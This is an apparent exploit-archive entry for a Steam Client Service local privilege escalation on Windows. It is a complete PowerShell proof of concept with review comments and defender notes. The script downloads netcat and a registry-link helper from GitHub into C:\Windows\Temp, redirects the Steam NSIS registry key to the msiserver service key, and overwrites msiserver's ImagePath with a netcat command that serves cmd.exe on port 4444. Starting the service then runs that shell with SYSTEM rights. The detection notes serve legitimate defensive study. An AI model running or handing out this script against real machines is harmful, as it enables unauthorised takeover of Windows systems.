Steam Windows Client Local Privilege Escalation

2019.08.13
Credit: Absozed
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Proof-of-concept for a local privilege escalation through the Steam Client
# Service on Windows, reformatted one statement per line for review.
#
# What the script visibly does:
#   1. Downloads two executables into C:\Windows\Temp if either is missing.
#   2. Makes sure the Steam NSIS registry key is redirected to the msiserver
#      service key (via the RegLN.exe helper), then starts the Steam Client
#      Service.
#   3. Overwrites msiserver's ImagePath with its own command line and starts
#      msiserver, so that command runs under the service's account.
#
# NOTE(review): the script does not show why step 3 succeeds for an
# unprivileged user. Presumably the Steam Client Service rewrites permissions
# on keys under ...\Valve\Steam when it starts and follows the registry link
# to the msiserver key; confirm against the vendor advisory.
#
# Defender notes:
#   - Alert on writes to HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath
#     by non-administrative processes (Sysmon registry events 12/13/14, or
#     Security event 4657 with auditing enabled on the Services key).
#   - Alert on registry symbolic links created under HKLM\SOFTWARE by
#     non-administrative users, and on executables written to
#     C:\Windows\Temp followed by a service start.
#   - After a run, msiserver's ImagePath stays overwritten; restore it from a
#     known-good baseline and review the ACL on the service key.
#   - Keep the Steam client updated and check the vendor's advisory for the
#     fixed build.

# Registry key under the Steam installation that is replaced by a link.
$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
# Service configuration key of msiserver (the Windows Installer service);
# this is the key whose ImagePath gets overwritten.
$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
# Local drop paths for the two downloaded binaries (useful as file IoCs).
$RegDir = "C:\Windows\Temp\RegLN.exe"
$PayDir = "C:\Windows\Temp\payload.exe"
# Command line written into ImagePath: runs the dropped binary against the
# loopback address on port 4444 with "-e cmd.exe".
$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
# Download sources; nc.exe is saved locally as payload.exe (network IoCs).
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
$WebClient = New-Object System.Net.WebClient

# Fetch both binaries unless both files already exist on disk. No hash or
# signature check is made on what is downloaded.
If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir))) {
    $WebClient.DownloadFile($PayDownload, $PayDir)
    $WebClient.DownloadFile($RegDownload, $RegDir)
}

# Branch on whether an ImagePath value is readable through the Steam NSIS key.
# NOTE(review): presumably that is only the case once the key already links to
# the msiserver key, i.e. this is an "already set up" check; confirm.
If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue) {
    # Starting the Steam service comes before the registry write in both
    # branches, so the write evidently depends on it.
    Start-Service -DisplayName "Steam Client Service"
    # Replace the service binary path of msiserver with the command above.
    Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
    # Starting msiserver launches the replaced ImagePath under that service's
    # account (normally LocalSystem).
    Start-Service -Name "msiserver"
} Else {
    # Delete the real NSIS key so the helper can put a link in its place.
    Remove-Item -Path $SteamRegKey -Recurse
    # RegLN.exe is called with the NSIS key as source and the msiserver key as
    # target; presumably it creates a registry symbolic link. The helper is
    # not shown on this page.
    Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
    # Same three steps as the first branch.
    Start-Service -DisplayName "Steam Client Service"
    Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
    Start-Service -Name "msiserver"
}

